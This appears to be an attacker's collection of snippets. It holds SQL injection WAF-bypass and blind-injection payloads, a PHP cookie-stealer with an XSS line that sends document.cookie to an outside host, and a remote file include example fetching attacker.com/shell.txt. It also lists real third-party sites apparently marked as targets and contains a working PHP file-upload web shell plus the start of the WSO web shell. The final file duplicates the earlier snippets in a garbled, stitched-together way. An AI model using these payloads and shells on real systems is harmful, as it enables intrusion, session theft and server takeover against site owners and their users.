Aung Myat Thu zenzue

## k6.txt
import http from "k6/http";
  import { check, sleep } from "k6";

  export default function() {
    const res = http.get("https://www.electionsquare.info/election-square/2020-election/eyJpdiI6IlpYbEp2Nm1RdGt6V2hwNm5wMmhBWWc9PSIsInZhbHVlIjoiVG91SDVvUENcLzVJOExKQ3lJWmtJSHJFNTFjd1MxU0N6aVFCRklKXC91MTVFPSIsIm1hYyI6ImRhNjYyYmU5YmRiZTA1NjZkNjZlNDM1Zjc0M2Q0YWM2M2E5ZjhiMTRjYzdlMWY3NmRlMDBmYWU0NTY1Y2EwZTUifQ==");
    check(res, {
        "protocol is HTTP/2": (r) => r.proto === 'HTTP/2.0'
    });
    sleep(1);
  }

## wafbypass
 SQLI Injction WAF Bypass Methods With Details
———————————————-
–‘- : +–+ / : — – : –+- : /*
) order by 1– –
‘) order by 1– –
‘)order by 1%23%23
%’)order by 1%23%23
Null’ order by 100–+
Null’ order by 9999–+
‘)group by 99– –

## xss cookies
<?php
# Cookie Stealer PHP Script ####### by d1t1 #######
# Save it as coo.php and create a file empty named "cookies" and with permissions 622 (chmod 622 cookies)
# It doenst work for facebook because facebook.com cookies has the "HttpOnly" flag (unable to get the datr cookie that authenticates at facebook)
#########################################################################################################################
# USAGE															#
# SCRIPT MODE:														#
# <script language="Javascript"> document.location="http://d1t1.tk:8080/coo.php?"c=+document.cookie; </script>		#
#															#
# TEST MODE:														#

## fileinclude
File Include

## 1) Direct Remote Include
Including php file in text format directly
```
http://www.site.com/lfi.hpp?page=http://attacker.com/shell.txt
```

## 2) Data:text/plain
Including php code through data stream

## challenge
http://myanmarsubtitlemovie.com/search.php
https://www.actiontrucks.com/search?find=
https://forums.asianbandar.com/searchmemberposts.cfm?membername=
https://love.hu/?inviter=
https://www.ukrinform.ru/?params[query]=
https://www.magenet.com/?email=

## Boolean Base
1' AND 1=1--+   == True
1' AND 1=0--+   == False

for version check
1' AND (ascii(substr((select version()),1,1))) = 53 --+ // 53 = 5

for database lenght check
1' AND (ascii(substr((select length(database())),1,1))) = 56--+  //56 = 8

for database check

## webadmin.php
<?php

$lang = 'auto';

/* Homedir:
 * For example: './' - the script's directory
 */
$homedir = './';

/* Size of the edit textarea

## mysql
Query Type

	DDL - Definition (  Database, Table, Column )
	DCL - Control ( Account, Permission )
	DML - Manipulation ( Record CRUD )

-- DDL - Data Definition Language --

CREATE DATABASE `db-name`;

## uploader.txt
<?php echo '<b><br><br>'.php_uname().'<br></b>'; echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">'; echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>n003</b><br><br>'; } else { echo '<b>Upload Sucess !!!</b><br><br>'; } } ?>

## 404.txt
<?php
/* WSO 2.6 (404 Error Web Shell by Madleets.com) */
/*Maded by DrSpy*/
$auth_pass = "2a9d119df47ff993b662a8ef36f9ea20"; //p4ssw0rd
$color = "#00ff00";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';

if(!empty($_SERVER['HTTP_USER_AGENT'])) {
	import http from "k6/http";
	import { check, sleep } from "k6";

	export default function() {
	const res = http.get("https://www.electionsquare.info/election-square/2020-election/eyJpdiI6IlpYbEp2Nm1RdGt6V2hwNm5wMmhBWWc9PSIsInZhbHVlIjoiVG91SDVvUENcLzVJOExKQ3lJWmtJSHJFNTFjd1MxU0N6aVFCRklKXC91MTVFPSIsIm1hYyI6ImRhNjYyYmU5YmRiZTA1NjZkNjZlNDM1Zjc0M2Q0YWM2M2E5ZjhiMTRjYzdlMWY3NmRlMDBmYWU0NTY1Y2EwZTUifQ==");
	check(res, {
	"protocol is HTTP/2": (r) => r.proto === 'HTTP/2.0'
	});
	sleep(1);
	}
	SQLI Injction WAF Bypass Methods With Details
	———————————————-
	–‘- : +–+ / : — – : –+- : /*
	) order by 1– –
	‘) order by 1– –
	‘)order by 1%23%23
	%’)order by 1%23%23
	Null’ order by 100–+
	Null’ order by 9999–+
	‘)group by 99– –
	<?php
	# Cookie Stealer PHP Script ####### by d1t1 #######
	# Save it as coo.php and create a file empty named "cookies" and with permissions 622 (chmod 622 cookies)
	# It doenst work for facebook because facebook.com cookies has the "HttpOnly" flag (unable to get the datr cookie that authenticates at facebook)
	#########################################################################################################################
	# USAGE #
	# SCRIPT MODE: #
	# <script language="Javascript"> document.location="http://d1t1.tk:8080/coo.php?"c=+document.cookie; </script> #
	# #
	# TEST MODE: #
	File Include

	## 1) Direct Remote Include
	Including php file in text format directly
	```
	http://www.site.com/lfi.hpp?page=http://attacker.com/shell.txt
	```

	## 2) Data:text/plain
	Including php code through data stream
	http://myanmarsubtitlemovie.com/search.php
	https://www.actiontrucks.com/search?find=
	https://forums.asianbandar.com/searchmemberposts.cfm?membername=
	https://love.hu/?inviter=
	https://www.ukrinform.ru/?params[query]=
	https://www.magenet.com/?email=
	1' AND 1=1--+ == True
	1' AND 1=0--+ == False

	for version check
	1' AND (ascii(substr((select version()),1,1))) = 53 --+ // 53 = 5

	for database lenght check
	1' AND (ascii(substr((select length(database())),1,1))) = 56--+ //56 = 8

	for database check
	<?php

	$lang = 'auto';

	/* Homedir:
	* For example: './' - the script's directory
	*/
	$homedir = './';

	/* Size of the edit textarea
	Query Type

	DDL - Definition ( Database, Table, Column )
	DCL - Control ( Account, Permission )
	DML - Manipulation ( Record CRUD )

	-- DDL - Data Definition Language --

	CREATE DATABASE `db-name`;
	<?php
	/* WSO 2.6 (404 Error Web Shell by Madleets.com) */
	/Maded by DrSpy/
	$auth_pass = "2a9d119df47ff993b662a8ef36f9ea20"; //p4ssw0rd
	$color = "#00ff00";
	$default_action = 'FilesMan';
	$default_use_ajax = true;
	$default_charset = 'Windows-1251';

	if(!empty($_SERVER['HTTP_USER_AGENT'])) {